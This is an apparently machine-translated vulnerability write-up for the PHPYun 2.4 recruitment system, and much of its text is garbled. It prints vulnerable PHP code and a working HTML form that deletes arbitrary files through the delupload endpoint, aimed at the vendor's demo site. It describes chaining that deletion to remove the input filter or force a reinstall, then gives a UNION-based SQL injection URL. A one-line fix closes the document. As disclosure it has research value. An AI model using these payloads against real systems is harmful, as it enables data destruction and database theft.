PHP cloud Talent System PHPYun Arbitrary File Deletion causes SQL Injection

PHP cloud Talent System PHPYun is a product of bkJia. Download source code: http://www.phpyun.com/phpyun_2.4_GBK_Beta.zip Version 2.4 first looks at the index. php file in the root directory: <? Phpinclude (dirname (_ FILE __). "/global. php "); ******************* $ act = $ _ GET ['ac']; $ task = $ _ GET ['task']; ********* omitting ************ require (MODEL_PATH. 'class/common. php '); require ("model /". $ act. '. class. php '); // contains the class under model. PHP File $ conclass = $ act. '_ controller'; $ actfunc = $ task. '_ action'; $ views = new $ conclass ($ phpyun, $ db, $ db_config ["def"], "index"); // instantiate a class if (! Method_exists ($ views, $ actfunc) {$ views-> DoException ();} $ views-> $ actfunc (); // access url: index. php? Act = ajax & task = delupload will call the delupload_action function of the ajax_controller class in model/ajax. class. php?> Go to global under the root directory. php error_reporting (0 ); // The error display is disabled .................................. ...... if ($ _ GET [act]! = "Admin_template") {include (CONFIG_PATH. "db. safety. php "); // contains data/db. safety. PHP file}. Check data/db again. safety. PHP file <? Phpfunction quotesGPC () {$ _ POST = array_map ("addSlash", $ _ POST); $ _ GET = array_map ("addSlash", $ _ GET ); $ _ COOKIE = array_map ("addSlash", $ _ COOKIE);} function addSlash ($ el) {if (is_array ($ el) return array_map ("addSlash ", $ el); elsereturn addslashes ($ el);} function gpc2sql ($ str) {$ arr = array ("and" => "an d ", "or" => "Or", "% 20" => "", "select" => "Select", "update" => "Update ", "count" => "Count", "chr" => "Chr", "trunc Ate "=>" Truncate "," union "=>" Union "," delete "=>" Delete "," insert "=>" Insert "); foreach ($ arr as $ key => $ v) {$ str = preg_replace ('/'. $ key. '/isu', $ v, $ str);} return $ str;} function common_htmlspecialchars ($ str) {$ str = preg_replace ('/&(?! # [0-9] +;)/s', '& amp;', $ str); $ str = str_replace (array ('&', '<', '>', '"', 'and'," '"), array (" & amp; ",' & lt; ',' & gt ;', '& quot;', 'an d', "& acute;"), $ str); return gpc2sql ($ str );} foreach ($ _ POST as $ id = >$ v) {$ _ POST [$ id] = common_htmlspecialchars ($ v );} foreach ($ _ GET as $ id => $ v) {if (! Is_array ($ v) $ v = substr (strip_tags ($ v), 0, 80); $ _ GET [$ id] = common_htmlspecialchars ($ v );} foreach ($ _ COOKIE as $ id = >$ v) {$ v = substr (strip_tags ($ v ); $ _ COOKIE [$ id] = common_htmlspecialchars ($ v) ;}?> We can see that the values of $ _ POST, $ _ GET, and $ _ cookies are filtered and escaped, making XSS and SQL Injection difficult. Well, the problem lies in mode/ajax. class. php. Let's see the delupload_action function delupload_action () {if (! $ This-> uid |! $ This-> username | $ _ COOKIE ["usertype"]! = 2) {// you need to register an enterprise user before logging on. Enterprise user usertype is 2. Individual users need to modify cookieecho 0; die ;} else {$ dir = $ _ POST [str] [0]; // set the value of [str] [0] In the POST form to delete any file. echo @ unlink (". ". $ dir); // call the unlink function to delete a file} to construct an html file: <form action =" http://demo.phpyun.com/index.php?act=ajax&task=delupload "Method =" post "> <br> file to be deleted: <input type = "text" name = "str [0]" value = "/robots.txt" size = 120> <br> <input type = "submit" value = "submit"> </form> after submission, the robots.txt file is deleted.
If you delete/data/phpyun. lock can be reinstalled if/data/db is deleted. safety. php does not filter $ _ POST, $ _ GET, and $ _ cookies, such as deleting/data/db. safety. after php, you can use mode/ajax. class. the getzphcom_action function in php performs SQL injection: function getzphcom_action () {extract ($ _ GET); // $ jobid = $ _ GET ["jobid"] if (! $ Jobid) {$ arr ['status'] = 0; $ arr ['content'] = iconv ("gbk", "UTF-8", "You have no position yet, <a href = 'index. php? Act = login & usertype = 2'> log on first </a> ");} else {$ row = $ this-> obj-> DB_select_all (" company_job ", "'id' in ($ jobid)"); // $ jobid can be injected into foreach ($ row as $ v) {$ data. = $ v [name]. '<br>';} $ arr ['status'] = 1; $ arr ['content'] = iconv ("gbk", "UTF-8", $ data );} echo json_encode ($ arr);} injection: Access/index. php? Act = ajax & task = getzphcom & jobid =-1) union select 1, 2, concat (user (), 0x7c, database (), 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, the injection test is successful locally at, 30% 23 www.2cto.com. The injection test fails at demo.phpyun.com.

 Solution:

Only allow users to delete specific files uploaded by users.